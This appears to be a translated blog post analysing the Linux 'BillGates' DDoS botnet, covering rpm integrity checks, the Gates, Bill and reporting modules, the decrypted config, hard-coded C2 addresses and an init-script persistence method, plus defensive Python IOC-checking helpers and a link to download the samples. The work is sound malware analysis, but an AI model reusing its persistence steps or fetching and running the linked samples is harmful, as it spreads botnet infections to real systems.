.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-du.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-el.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-en.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-es.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-fi.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-fr.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-he-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-hr-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-hr.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-hu.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-it.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-jp.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ko-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ko.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-lt-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-lt.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-lv.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-nl.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-no.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-pl-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-pl.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-pt.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ro.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ru.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ru_win_.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-si.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-sk.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-sp.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-sv.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-tr.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-zh.js
.M.......    /usr/share/cacti/include/jscalendar/lang/cn_utf8.js
.M.......    /usr/share/cacti/include/layout.js
.M.......    /usr/share/cacti/include/main.css
.M.......    /usr/share/cacti/include/plugins.php
.M.......    /usr/share/cacti/include/top_graph_header.php
.M.......    /usr/share/cacti/include/top_header.php
.M.......    /usr/share/cacti/include/treeview
.M.......    /usr/share/cacti/include/treeview/ftiens4.js
.M.......    /usr/share/cacti/include/treeview/ftiens4_export.js
.M.......    /usr/share/cacti/include/treeview/ftv2blank.gif
.M.......    /usr/share/cacti/include/treeview/ftv2lastnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2mlastnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2mnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2node.gif
.M.......    /usr/share/cacti/include/treeview/ftv2plastnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2pnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2vertline.gif
.M.......    /usr/share/cacti/include/treeview/ua.js
.M.......    /usr/share/cacti/include/zoom.js
.M.......    /usr/share/cacti/index.php
.M.......    /usr/share/cacti/install
.M.......    /usr/share/cacti/install/0_8_1_to_0_8_2.php
.M.......    /usr/share/cacti/install/0_8_2_to_0_8_2a.php
.M.......    /usr/share/cacti/install/0_8_2a_to_0_8_3.php
.M.......    /usr/share/cacti/install/0_8_3_to_0_8_4.php
.M.......    /usr/share/cacti/install/0_8_4_to_0_8_5.php
.M.......    /usr/share/cacti/install/0_8_5a_to_0_8_6.php
.M.......    /usr/share/cacti/install/0_8_6_to_0_8_6a.php
.M.......    /usr/share/cacti/install/0_8_6c_to_0_8_6d.php
.M.......    /usr/share/cacti/install/0_8_6d_to_0_8_6e.php
.M.......    /usr/share/cacti/install/0_8_6f_to_0_8_6g.php
.M.......    /usr/share/cacti/install/0_8_6g_to_0_8_6h.php
.M.......    /usr/share/cacti/install/0_8_6h_to_0_8_6i.php
.M.......    /usr/share/cacti/install/0_8_6j_to_0_8_7.php
.M.......    /usr/share/cacti/install/0_8_7_to_0_8_7a.php
.M.......    /usr/share/cacti/install/0_8_7a_to_0_8_7b.php
.M.......    /usr/share/cacti/install/0_8_7b_to_0_8_7c.php
.M.......    /usr/share/cacti/install/0_8_7c_to_0_8_7d.php
.M.......    /usr/share/cacti/install/0_8_7d_to_0_8_7e.php
.M.......    /usr/share/cacti/install/0_8_7e_to_0_8_7f.php
.M.......    /usr/share/cacti/install/0_8_7f_to_0_8_7g.php
.M.......    /usr/share/cacti/install/0_8_7g_to_0_8_7h.php
.M.......    /usr/share/cacti/install/0_8_7h_to_0_8_7i.php
.M.......    /usr/share/cacti/install/0_8_7i_to_0_8_8.php
.M.......    /usr/share/cacti/install/0_8_8_to_0_8_8a.php
.M.......    /usr/share/cacti/install/0_8_to_0_8_1.php
.M.......    /usr/share/cacti/install/index.php
.M.......    /usr/share/cacti/install/install_finish.gif
.M.......    /usr/share/cacti/install/install_next.gif
.M.......    /usr/share/cacti/lib
.M.......    /usr/share/cacti/lib/adodb
.M.......    /usr/share/cacti/lib/adodb/adodb-csvlib.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-datadict.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-error.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-errorhandler.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-errorpear.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-exceptions.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-iterator.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-lib.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-pear.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-perf.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-php4.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-time.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-xmlschema.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-access.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-db2.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-firebird.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-generic.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-ibase.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-informix.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-mysql.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-oci8.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-postgres.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-sapdb.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-sybase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-access.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado5.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado_access.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado_mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-borland_ibase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-csv.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-db2.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-fbsql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-firebird.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ibase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-informix.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-informix72.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ldap.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mssqlpo.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mysql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mysqli.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mysqlt.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-netezza.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oci8.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oci805.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oci8po.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbc.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbc_mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbc_oracle.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbtp.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbtp_unicode.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oracle.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-pdo.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-postgres.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-postgres64.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-postgres7.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-proxy.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sapdb.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sqlanywhere.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sqlite.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sqlitepo.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sybase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-vfp.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ar.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-bg.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-bgutf8.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ca.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-cn.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-cz.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-de.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-en.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-es.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-fr.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-hu.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-it.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-nl.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-pl.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-pt-br.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ro.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ru1251.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-sv.inc.php
.M.......    /usr/share/cacti/lib/adodb/license.txt
.M.......    /usr/share/cacti/lib/adodb/toexport.inc.php
.M.......    /usr/share/cacti/lib/adodb/tohtml.inc.php
.M.......    /usr/share/cacti/lib/api_automation_tools.php
.M.......    /usr/share/cacti/lib/api_data_source.php
.M.......    /usr/share/cacti/lib/api_device.php
.M.......    /usr/share/cacti/lib/api_graph.php
.M.......    /usr/share/cacti/lib/api_poller.php
.M.......    /usr/share/cacti/lib/api_tree.php
.M.......    /usr/share/cacti/lib/auth.php
.M.......    /usr/share/cacti/lib/cdef.php
.M.......    /usr/share/cacti/lib/data_query.php
.M.......    /usr/share/cacti/lib/database.php
.M.......    /usr/share/cacti/lib/export.php
.M.......    /usr/share/cacti/lib/functions.php
.M.......    /usr/share/cacti/lib/graph_export.php
.M.......    /usr/share/cacti/lib/graph_variables.php
.M.......    /usr/share/cacti/lib/html.php
.M.......    /usr/share/cacti/lib/html_form.php
.M.......    /usr/share/cacti/lib/html_form_template.php
.M.......    /usr/share/cacti/lib/html_tree.php
.M.......    /usr/share/cacti/lib/html_utility.php
.M.......    /usr/share/cacti/lib/html_validate.php
.M.......    /usr/share/cacti/lib/import.php
.M.......    /usr/share/cacti/lib/ldap.php
.M.......    /usr/share/cacti/lib/ping.php
.M.......    /usr/share/cacti/lib/plugins.php
.M.......    /usr/share/cacti/lib/poller.php
.M.......    /usr/share/cacti/lib/rrd.php
.M.......    /usr/share/cacti/lib/snmp.php
.M.......    /usr/share/cacti/lib/sort.php
.M.......    /usr/share/cacti/lib/template.php
.M.......    /usr/share/cacti/lib/time.php
.M.......    /usr/share/cacti/lib/timespan_settings.php
.M.......    /usr/share/cacti/lib/tree.php
.M.......    /usr/share/cacti/lib/utility.php
.M.......    /usr/share/cacti/lib/variables.php
.M.......    /usr/share/cacti/lib/xml.php
.M.......    /usr/share/cacti/logout.php
.M.......    /usr/share/cacti/plugins
.M.......    /usr/share/cacti/plugins.php
.M.......    /usr/share/cacti/plugins/index.php
.M.......    /usr/share/cacti/poller.php
.M.......    /usr/share/cacti/poller_commands.php
.M.......    /usr/share/cacti/poller_export.php
.M.......    /usr/share/cacti/resource
.M.......    /usr/share/cacti/resource/script_queries
.M.......    /usr/share/cacti/resource/script_queries/host_cpu.xml
.M.......    /usr/share/cacti/resource/script_queries/host_disk.xml
.M.......    /usr/share/cacti/resource/script_queries/unix_disk.xml
.M.......    /usr/share/cacti/resource/script_server
.M.......    /usr/share/cacti/resource/script_server/host_cpu.xml
.M.......    /usr/share/cacti/resource/script_server/host_disk.xml
.M.......    /usr/share/cacti/resource/snmp_queries
.M.......    /usr/share/cacti/resource/snmp_queries/host_disk.xml
.M.......    /usr/share/cacti/resource/snmp_queries/interface.xml
.M.......    /usr/share/cacti/resource/snmp_queries/kbridge.xml
.M.......    /usr/share/cacti/resource/snmp_queries/net-snmp_disk.xml
.M.......    /usr/share/cacti/resource/snmp_queries/netware_cpu.xml
.M.......    /usr/share/cacti/resource/snmp_queries/netware_disk.xml
.M.......    /usr/share/cacti/rra.php
.M.......    /usr/share/cacti/script_server.php
.M.......    /usr/share/cacti/settings.php
.M.......    /usr/share/cacti/templates_export.php
.M.......    /usr/share/cacti/templates_import.php
.M.......    /usr/share/cacti/tree.php
.M.......    /usr/share/cacti/user_admin.php
.M.......    /usr/share/cacti/utilities.php
.M.......    /var/lib/cacti
.M.......    /var/lib/cacti/cli
.M.......    /var/lib/cacti/cli/add_data_query.php
.M.......    /var/lib/cacti/cli/add_device.php
.M.......    /var/lib/cacti/cli/add_graph_template.php
.M.......    /var/lib/cacti/cli/add_graphs.php
.M.......    /var/lib/cacti/cli/add_perms.php
.M.......    /var/lib/cacti/cli/add_tree.php
.M.......    /var/lib/cacti/cli/analyze_database.php
.M.......    /var/lib/cacti/cli/convert_innodb.php
.M.......    /var/lib/cacti/cli/copy_user.php
.M.......    /var/lib/cacti/cli/data_template_associate_rra.php
.M.......    /var/lib/cacti/cli/host_update_template.php
.M.......    /var/lib/cacti/cli/import_template.php
.M.......    /var/lib/cacti/cli/poller_data_sources_reapply_names.php
.M.......    /var/lib/cacti/cli/poller_graphs_reapply_names.php
.M.......    /var/lib/cacti/cli/poller_output_empty.php
.M.......    /var/lib/cacti/cli/poller_reindex_hosts.php
.M.......    /var/lib/cacti/cli/rebuild_poller_cache.php
.M.......    /var/lib/cacti/cli/reorder_data_query.php
.M.......    /var/lib/cacti/cli/repair_database.php
.M.......    /var/lib/cacti/cli/repair_templates.php
.M.......    /var/lib/cacti/cli/structure_rra_paths.php
.M.......    /var/lib/cacti/cli/upgrade_database.php
.M.......    /var/lib/cacti/rra
.M.......    /var/lib/cacti/scripts
.M.......    /var/lib/cacti/scripts/3com_cable_modem.pl
.M.......    /var/lib/cacti/scripts/diskfree.pl
.M.......    /var/lib/cacti/scripts/diskfree.sh
.M.......    /var/lib/cacti/scripts/linux_memory.pl
.M.......    /var/lib/cacti/scripts/loadavg.pl
.M.......    /var/lib/cacti/scripts/loadavg_multi.pl
.M.......    /var/lib/cacti/scripts/ping.pl
.M.......    /var/lib/cacti/scripts/query_host_cpu.php
.M.......    /var/lib/cacti/scripts/query_host_partitions.php
.M.......    /var/lib/cacti/scripts/query_unix_partitions.pl
.M.......    /var/lib/cacti/scripts/sql.php
.M.......    /var/lib/cacti/scripts/ss_fping.php
.M.......    /var/lib/cacti/scripts/ss_host_cpu.php
.M.......    /var/lib/cacti/scripts/ss_host_disk.php
.M.......    /var/lib/cacti/scripts/ss_sql.php
.M.......    /var/lib/cacti/scripts/unix_processes.pl
.M.......    /var/lib/cacti/scripts/unix_tcp_connections.pl
.M.......    /var/lib/cacti/scripts/unix_users.pl
.M.......    /var/lib/cacti/scripts/weatherbug.pl
.M.......    /var/lib/cacti/scripts/webhits.pl
S.5....T.    /var/log/cacti/cacti.log
S.5....T.  c /etc/ntop.conf
.......T.  c /etc/avahi/hosts
S.5....T.  c /etc/netatalk/AppleVolumes.default
S.5....T.  c /etc/netatalk/afpd.conf
S.5....T.  c /etc/netatalk/netatalk.conf
S.5....T.  c /etc/httpd/conf.d/nagios.conf
S.5....T.  c /etc/nagios/nagios.cfg
S.5....T.  c /etc/nagios/objects/commands.cfg
S.5....T.  c /etc/nagios/objects/localhost.cfg
S.5....T.  c /etc/sysconfig/ntpd
S.5....T.  c /etc/profile
SM5..UGT.  c /etc/snmp/snmpd.conf
S.5....T.  c /etc/sysconfig/iptables-config
.......T.  c /etc/avahi/avahi-dnsconfd.action
S.5....T.  c /etc/dnsmasq.conf

This means that none of the system files were modified. Since the system processes were not hidden either, I assume no rootkit is involved here and can say with some confidence that the system is clean.

Searching for information about the botnet

The first thing I did was look for some information about this botnet, searching by the domain name and by the lines from the crontab file.

I found a few things right away:

My home PC has been 0wn3d :( @ forums.debian.net

What do sapd, skysapd, sksapd, and ksapd do? @ askubuntu.com

I Got Myself Hacked @ hackervisions.org

Suspected rootkit @ archlinuxarm.org

Overall, nothing interesting or new.

Examining the botnet files

Next I used the file utility to learn more about these executables:

atddd:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
cupsdd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
cupsddh:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
ksapdd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
kysapdd:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
skysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
xfsdxd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

Not stripped! What good news!

For some reason I liked the cupsdd file more and loaded it first instead of atddd. I can't say why myself, but it turned out to be exactly the right choice.

Gates

So, the "Gates" module is cupsdd (hashes: 603170ad361f6e098c8681ed264155eb and 1714fd31cc931e2a0eb97d25a076567af45dc6d8).

What does it do, and how? IDA Pro, for example, answers that for us.

What does this module do?

- Tries to initialize itself:

Decrypts the RSA-protected data, which in my case is:

116.10.189.246:30000:1:1:h:578856:579372:579888

and sets the variables as follows:

g_strConnTgt=116.10.189.246
g_iGatsPort=30000
g_iGatsIsFx=1
g_iIsService=1
g_strBillTail=h
g_strCryptStart=578856
g_strDStart=579372
g_strNStart=579888

The parameters are needed to determine the RSA data in case the module is updated.

- Attempts to install the "Bill" module:

Checks whether a Gates module already exists but is not running. If not, stores its PID in the lock file /tmp/bill.lock.

Finds the path of the current executable by reading /proc/%d/exe, allocates a buffer, appends the decrypted Bill tail to the path, opens the file there for writing and writes the data into it,

and launches the new file.

- Daemon functionality appears here: stdout and stderr, along with the current stdin, are rebound to /dev/null.

- Checks whether it (the "Gates" module) is itself already running, via the lock file /tmp/gates.lock. If it is running, Gates exits.

- Adds the unpacked "Bill" module to autostart with the simplest sysvinit init script, by creating /etc/init.d/DbSecuritySpt with the contents:

#!/bin/bash
/path/to/bill

and creating entries in /etc/rc[1-5].d/97dbsecurityspt:

- Starts the MainProcess() function:

Reads basic information about the system: CPU, memory, network cards.
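As an added example (not code from the original post or from the malware itself), here is a Python parser for the colon-separated configuration string shown above: it assigns the fields to the eight names the post lists and derives where the Bill copy is dropped by appending g_strBillTail to the Gates path, as the installation step describes. The /etc/cupsdd path is a constructed sample and the range checks are my own additions.

```python
from ipaddress import ip_address

# Field order of the decrypted Gates configuration string as the post lists it.
FIELDS = ("g_strConnTgt", "g_iGatsPort", "g_iGatsIsFx", "g_iIsService",
          "g_strBillTail", "g_strCryptStart", "g_strDStart", "g_strNStart")
# Fields this (hypothetical) parser converts to integers for range checks.
INT_FIELDS = {"g_iGatsPort", "g_iGatsIsFx", "g_iIsService",
              "g_strCryptStart", "g_strDStart", "g_strNStart"}


def parse_gates_config(blob: str) -> dict:
    """Split the colon-separated config into the eight named globals."""
    parts = blob.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    cfg = {name: (int(raw) if name in INT_FIELDS else raw)
           for name, raw in zip(FIELDS, parts)}
    # Sanity checks a triage script wants before trusting an extracted config:
    # a parseable C2 address, a valid port, and ascending blob offsets.
    ip_address(cfg["g_strConnTgt"])
    if not 0 < cfg["g_iGatsPort"] < 65536:
        raise ValueError("port out of range")
    offs = (cfg["g_strCryptStart"], cfg["g_strDStart"], cfg["g_strNStart"])
    if not offs[0] < offs[1] < offs[2]:
        raise ValueError("offsets not ascending")
    return cfg


def bill_path_for(gates_exe: str, cfg: dict) -> str:
    """Gates drops Bill beside itself with the tail appended: cupsdd -> cupsddh."""
    return gates_exe + cfg["g_strBillTail"]


# Constructed input: the config string quoted in the post and a sample path.
SAMPLE_CONFIG = "116.10.189.246:30000:1:1:h:578856:579372:579888"

if __name__ == "__main__":
    cfg = parse_gates_config(SAMPLE_CONFIG)
    for name in FIELDS:
        print(f"{name}={cfg[name]}")
    print("Bill would be written to", bill_path_for("/etc/cupsdd", cfg))
```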

Bill

"Bill" is the DDoS module. In my case it is called "cupsddh".

- Can attack hosts with TCP, UDP, ICMP and DNS amplification methods. Limits its own CPU usage.

- Reads basic information about the system: CPU, memory, network cards, hard disks.

- Reads DNS information.

- Loads the module /usr/lib/xpacket.ko.

- Writes its own /usr/lib/libamplify.so.

I started looking into how it can receive commands from the main module to carry out an attack.

The "knocking" module

ksapdd sends file statistics to the main server.

The server and port are hard-coded into the program; in my case the decoded result is 121.12.110.96:10991.

The files kysapdd, skysapdd, atddd and xfsdxd are copies of ksapdd, but the first connects to 112.90.252.76:10991, the second to 112.90.22.197:10991, the third to 116.10.189.246:10991 and the fourth to 202.103.178.76:10991.
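As an added defender-side example, not part of the original post, the following Python triage helpers check a host (or a mounted image, via the root parameter) for the artifacts the post names, and pick out connections to the hard-coded endpoints listed above from ss -tn style output. The ss lines are constructed, and the rc-directory match is case-insensitive because the post's rendering of the rc entry name is lowercased.

```python
from pathlib import Path
from typing import List

# Hard-coded endpoints the post pulled out of the samples: one per copy of the
# knocking module, plus the Gates connection target from its config string.
KNOWN_C2 = {
    ("121.12.110.96", 10991), ("112.90.252.76", 10991), ("112.90.22.197", 10991),
    ("116.10.189.246", 10991), ("202.103.178.76", 10991), ("116.10.189.246", 30000),
}

# Filesystem artifacts the post describes, relative to the filesystem root.
ARTIFACTS = ("tmp/bill.lock", "tmp/gates.lock", "etc/init.d/DbSecuritySpt",
             "usr/lib/xpacket.ko", "usr/lib/libamplify.so")


def persistence_artifacts(root: str = "/") -> List[str]:
    """List the post's artifacts present under root (a mounted image or live /)."""
    base = Path(root)
    found = [str(base / rel) for rel in ARTIFACTS if (base / rel).exists()]
    for level in range(1, 6):          # /etc/rc[1-5].d entries for the init script
        rcdir = base / f"etc/rc{level}.d"
        if rcdir.is_dir():
            found += [str(p) for p in rcdir.iterdir()
                      if p.name.lower().endswith("dbsecurityspt")]
    return found


def c2_connections(ss_lines: List[str]) -> List[str]:
    """Return ss -tn style lines whose peer address is a known C2 endpoint."""
    hits = []
    for line in ss_lines:
        cols = line.split()
        if len(cols) < 5:
            continue
        host, _, port = cols[4].rpartition(":")   # peer column is "addr:port"
        if port.isdigit() and (host, int(port)) in KNOWN_C2:
            hits.append(line)
    return hits


# Constructed sample in ss -tn layout, not captured from a real host.
SAMPLE_SS = [
    "State Recv-Q Send-Q Local Address:Port   Peer Address:Port",
    "ESTAB 0      0      10.0.0.5:48122       121.12.110.96:10991",
    "ESTAB 0      0      10.0.0.5:41002       192.0.2.10:443",
]

if __name__ == "__main__":
    print(persistence_artifacts("/"))
    print(c2_connections(SAMPLE_SS))
```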

Conclusion

Well, having gone through all this, we should pay more attention to hardening the servers we manage and take good care of our own servers.

All the files are here: rghost.ru/52680741

Tags: botnet, Linux, reverse engineering

That's all; finally, one more line:

Do you still remember the reason why you are here?

The Linux botnet virus "BillGates" (Bubuko, bubuko.com)

Time: 2024-10-25 07:46:32
